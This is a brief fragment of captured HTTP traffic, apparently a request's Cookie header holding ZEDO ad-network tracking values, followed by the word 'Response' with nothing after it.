Cookie: ZEDOIDX=29; FFgeo=2241452; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFChanCap=1573B496,121#876543#543485#675101#544906#543481|1,1,1:0,1,1:14,1,1:0,1,1:0,1,1; ZCBC=1; FFad=0; FFcat=929,286,14

Response